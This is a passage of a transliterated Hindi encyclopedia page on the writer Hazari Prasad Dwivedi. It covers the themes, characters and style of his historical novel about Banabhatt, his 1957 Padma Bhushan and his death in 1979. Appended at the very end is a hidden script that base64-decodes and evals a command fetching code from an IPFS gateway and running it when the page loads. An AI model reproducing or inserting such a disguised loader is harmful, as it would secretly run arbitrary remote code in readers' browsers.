tatha inase sambaddh ghatanaean kalpana prasoot haian. itihas aur kalpana ke samuchit viniyog dvara lekhak ne upanyas ko jo roop-rang diya hai, vah bahut hi akarshak ban p da hai. is aitihasik upanyas mean manav-mooly ki naye manavatavadi mooly ki pratishtha karana bhi lekhak ka pramukh uddeshy raha hai. jinako lok 'band' ya kul bhrasht samajhata hai, ve bhitar se kitane mahan haian, ise banabhatt aur nipunika (niuniya) mean dekha ja sakata hai. lok chetana ya lok shakti ko atyant vishvasamayi vani mean mahamaya dvara jagaya gaya hai. yah lekhak ka apana vishvas bhi hai. dvivedi ji prem ko seks se samprikt n karate hue bhi use jis ooanchaee par pratishthit karate haian, vah sarvatha manovaijnanik hai. prem ke uchchatar sopan par pahuanchane ke lie apana sab kuchh utsarg karana p data hai. nipunika ko naritv prapt hua tapasya ki agni mean jalane par. banabhatt ki pratibha ko char-chaand laga prem ka unnayanatmak svaroop samajhane par. sucharita ko abhipsit ki upalabdhi huee prem ke vasanatmak svaroop ki nishkriti par. shaili ki drishti se yah paramparik svachchhandatavadi (klaisikal romantik) rachana hai. banabhatt ki shaili ko adhar manane ke karan lekhak ko varnan ki vistrit aur sanshlisht paddhati apanani p di hai, par bich-bich mean usaki apani svachchhand pravritti bhi jagarook rahi hai, jisase lambi alankrit shaili ki duroohata ka bahut kuchh parishkar ho jata hai. unaka doosara upanyas 'charuchandralekh' bhi prakashit ho chuka hai.

puraskar

hazari prasad dvivedi ji ko bharat sarakar ne unaki viddhatta aur sahityik sevaoan ko dhyan mean rakhate hue sahity evan shiksha ke kshetr mean sanh 1957 mean padm bhooshan se sammanit kiya gaya tha.

mrityu

hazari prasad dvivedi ji ki mrityu 19 mee, 1979 ee. mean huee thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

hazari prasad dvivedi vishay soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>